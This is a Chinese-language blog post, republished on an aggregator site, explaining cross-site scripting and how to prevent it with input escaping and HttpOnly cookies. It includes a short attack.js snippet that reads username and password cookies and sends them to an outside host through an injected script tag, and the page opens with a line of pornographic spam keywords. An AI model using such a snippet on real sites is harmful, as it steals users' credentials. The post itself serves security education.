国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網(wǎng)首頁
  2. >Toy博客

XSS攻擊是怎么回事?記錄一下

2年前作者:chenzuoli分類:Toy博客閱讀(20)違法舉報

這篇具有很好參考價值的文章主要介紹了XSS攻擊是怎么回事?記錄一下。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

title: XSS攻擊

date: 2023-08-27 19:15:57

tags: [XSS, 網(wǎng)絡(luò)安全]

categories: 網(wǎng)絡(luò)安全

今天學(xué)習(xí)了一個網(wǎng)絡(luò)攻擊的手段,XSS攻擊技術(shù),大家自建網(wǎng)站的朋友,記得看看是否有此漏洞。

?? XSS 攻擊
全稱跨站腳本攻擊 Cross Site Scripting。
為了與重疊樣式表 CSS 進行區(qū)分,所以換了另一個縮寫名稱 XSS。
XSS攻擊者通過篡改網(wǎng)頁,注入惡意的 HTML 腳本,一般是 javascript,在用戶瀏覽網(wǎng)頁時,控制用戶瀏覽器進行惡意操作的一種攻擊方式。
XSS 攻擊經(jīng)常使用在論壇,博客等應(yīng)用中。攻擊者可以偷取用戶Cookie、密碼等重要數(shù)據(jù),進而偽造交易、盜取用戶財產(chǎn)、竊取情報等私密信息。

XSS攻擊是怎么回事?記錄一下,xss,前端,網(wǎng)絡(luò)安全

就像上圖,如果用戶在評論框中輸入的并不是正常的文本,而是一段 javascript 腳本,而后臺又沒對該用戶的數(shù)據(jù)進行處理,直接存入數(shù)據(jù)庫,那么當(dāng)其他用戶過來訪問該頁面,瀏覽器必然會執(zhí)行這段腳本
當(dāng)然這只是惡趣味,而真正的黑客并不會僅僅滿足這樣的惡趣味,可能更多的是想通過這些 注入腳本,獲取你的 個人信息 ,甚至是你的賬號密碼等信息。

XSS攻擊是怎么回事?記錄一下,xss,前端,網(wǎng)絡(luò)安全

由上圖可知,用戶其實在評論的時候,引入了一個第三方腳本,在這個腳本中獲取你瀏覽器的 cookie 信息,并發(fā)送到指定的接口進行保存處理,這樣你的信息就已經(jīng)泄露了:


// attack.js 中的邏輯
var uname = $.cookie('username'); // 獲取賬號
var pwd = $.cookie('password'); // 獲取密碼

// 發(fā)送請求
$('body').appendTo('<script src=`http://autofelix.com/index.php?username=${uname}&password=${pwd}`></script>');

在上面邏輯中,腳本中獲取了你的個人信息,并將你的個人信息發(fā)送到后端 php 文件中進行處理保存,這樣你的個人信息就已經(jīng)泄露了,所以杜絕 xss攻擊 在網(wǎng)絡(luò)安全中非常的重要
所以后端永遠不要相信用戶提交的數(shù)據(jù),在接收用戶提交的信息時候,要進行 消毒處理
也就是過濾一些特殊的字符,比如 javascript 腳本中的 <> 進行轉(zhuǎn)移 <> 再進行存儲,這樣就能有效的進行 xss 攻擊的預(yù)防
另外如果 cookie 中設(shè)置了 HttpOnly 屬性,那么通過 js 腳本將無法讀取到cookie 信息,這樣也能有效的防止 XSS 攻擊竊取 cookie 內(nèi)容

XSS攻擊是怎么回事?記錄一下,xss,前端,網(wǎng)絡(luò)安全

好記性不如爛筆頭。文章來源地址http://www.zghlxwxcb.cn/news/detail-677223.html

到了這里,關(guān)于XSS攻擊是怎么回事?記錄一下的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • XSS 攻擊是什么?怎么驗證是否有XSS攻擊漏洞?

    XSS(跨站腳本,Cross-Site Scripting)攻擊是一種網(wǎng)絡(luò)攻擊,攻擊者利用網(wǎng)站漏洞將惡意腳本注入用戶的瀏覽器,從而在用戶瀏覽網(wǎng)頁時執(zhí)行惡意代碼。這種攻擊可能造成用戶敏感信息泄露、釣魚、欺詐等安全問題。 驗證是否有 XSS 攻擊漏洞的方法: 手動測試:通過對輸入框、

    2024年02月11日
    瀏覽(22)

  • 網(wǎng)絡(luò)安全進階學(xué)習(xí)第二課——XSS跨站腳本攻擊

    首先了解什么是前端。前端從定義上來講是指一個網(wǎng)站的前臺部分,是展示給用戶看的部分。它不需要關(guān)注任何業(yè)務(wù)之間的邏輯處理,只需要安安靜靜地做好自己,老老實實的把自己最美的一面展示給用戶。 Cookie 是在 HTTP 協(xié)議下,服務(wù)器或腳本可以維護客戶工作站上信息的

    2024年02月11日
    瀏覽(25)

  • 【前端安全】-【防范xss攻擊】

    XSS 攻擊是頁面被注入了惡意的代碼 公司需要一個搜索頁面,根據(jù) URL 參數(shù)決定的內(nèi)容。小明寫的前端頁面代碼如下: 如果這個url是: http://xxx/search?keyword=\\\"scriptalert(\\\'XSS\\\');/script ,會導(dǎo)致頁面彈出兩次彈窗,因為當(dāng)瀏覽器請求 http://xxx/search?keyword=\\\"scriptalert(\\\'XSS\\\');/script 時,

    2024年02月09日
    瀏覽(20)
  • 記錄--詳解 XSS(跨站腳本攻擊)

    記錄--詳解 XSS(跨站腳本攻擊)

    前言:我們知道同源策略可以隔離各個站點之間的 DOM 交互、頁面數(shù)據(jù)和網(wǎng)絡(luò)通信,雖然嚴格的同源策略會帶來更多的安全,但是也束縛了 Web。這就需要在安全和自由之間找到一個平衡點,所以我們默認頁面中可以引用任意第三方資源,然后又引入 CSP 策略來加以限制;默認

    2024年02月08日
    瀏覽(24)
  • [網(wǎng)絡(luò)安全]XSS之Cookie外帶攻擊姿勢及例題詳析(基于DVWA靶場)

    [網(wǎng)絡(luò)安全]XSS之Cookie外帶攻擊姿勢及例題詳析(基于DVWA靶場)

    本文僅分享XSS攻擊知識,不承擔(dān)任何法律責(zé)任。 本文涉及的軟件等請讀者自行安裝,本文不再贅述。 XSS 的 Cookie 外帶攻擊就是一種針對 Web 應(yīng)用程序中的 XSS(跨站腳本攻擊)漏洞進行的攻擊,攻擊者通過在 XSS 攻擊中注入惡意腳本,從而 竊取用戶的 Cookie 信息 。 在使用XSS語

    2024年02月08日
    瀏覽(23)
  • 前端安全系列(一):如何防止XSS攻擊?

    前端安全系列(一):如何防止XSS攻擊?

    隨著互聯(lián)網(wǎng)的高速發(fā)展,信息安全問題已經(jīng)成為企業(yè)最為關(guān)注的焦點之一,而前端又是引發(fā)企業(yè)安全問題的高危據(jù)點。在移動互聯(lián)網(wǎng)時代,前端人員除了傳統(tǒng)的 XSS、CSRF 等安全問題之外,又時常遭遇網(wǎng)絡(luò)劫持、非法調(diào)用 Hybrid API 等新型安全問題。當(dāng)然,瀏覽器自身也在不斷在

    2024年02月02日
    瀏覽(38)

  • 網(wǎng)絡(luò)安全測試中的跨站點腳本攻擊(XSS):Python和FlaskSecurity實現(xiàn)跨站腳本攻擊測試

    作者:禪與計算機程序設(shè)計藝術(shù) 引言 1.1. 背景介紹 跨站點腳本攻擊(XSS)是一種常見的網(wǎng)絡(luò)安全漏洞,攻擊者通過在受害者的瀏覽器上執(zhí)行自己的腳本代碼,竊取、修改用戶的敏感信息。隨著互聯(lián)網(wǎng)的發(fā)展,跨站點腳本攻擊在各類應(yīng)用中愈發(fā)普遍。為了提高網(wǎng)絡(luò)安全水平,

    2024年02月07日
    瀏覽(20)

  • XSS 攻擊時怎么繞過 htmlspecialchars 函數(shù)

    htmlspecialchars xss攻擊很多場景下htmlspecialchars過濾未必能奏效。 1.形成反射xss htmlspecialchars默認是不過濾單引號的,只有設(shè)置了:quotestyle選項為ENT_QUOTES才會過濾單引號,如果此時你得輸出為 那么仍然會繞過htmlspecialchars()函數(shù)的檢查,從而造成一個反射型的xss 2. 僅僅用了htmlsp

    2023年04月08日
    瀏覽(16)
  • 【網(wǎng)絡(luò)安全】URL解析器混淆攻擊實現(xiàn)ChatGPT賬戶接管、Glassdoor服務(wù)器XSS

    【網(wǎng)絡(luò)安全】URL解析器混淆攻擊實現(xiàn)ChatGPT賬戶接管、Glassdoor服務(wù)器XSS

    本文不承擔(dān)任何由于傳播、利用本文所發(fā)布內(nèi)容而造成的任何后果及法律責(zé)任。 本文將基于ChatGPT及Glassdoor兩個實例闡發(fā)URL解析器混淆攻擊。 開始本文前,推薦閱讀:【網(wǎng)絡(luò)安全】Web緩存欺騙攻擊原理及攻防實戰(zhàn) ChatGPT新增了\\\"分享\\\"功能,該功能允許用戶與其他人公開分享聊天

    2024年02月20日
    瀏覽(20)

  • 前端面試題---HTTP/HTTPS以及XSS攻擊

    HTTP(Hypertext Transfer Protocol)是一種用于在網(wǎng)絡(luò)上傳輸超文本的協(xié)議。它基于客戶端-服務(wù)器模型,客戶端發(fā)起請求,服務(wù)器響應(yīng)請求并返回相應(yīng)的數(shù)據(jù)。以下是 HTTP 的基本工作原理: 1. 客戶端發(fā)起請求:客戶端(通常是瀏覽器)向服務(wù)器發(fā)送 HTTP 請求。請求包括請求行、請求

    2024年02月09日
    瀏覽(21)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包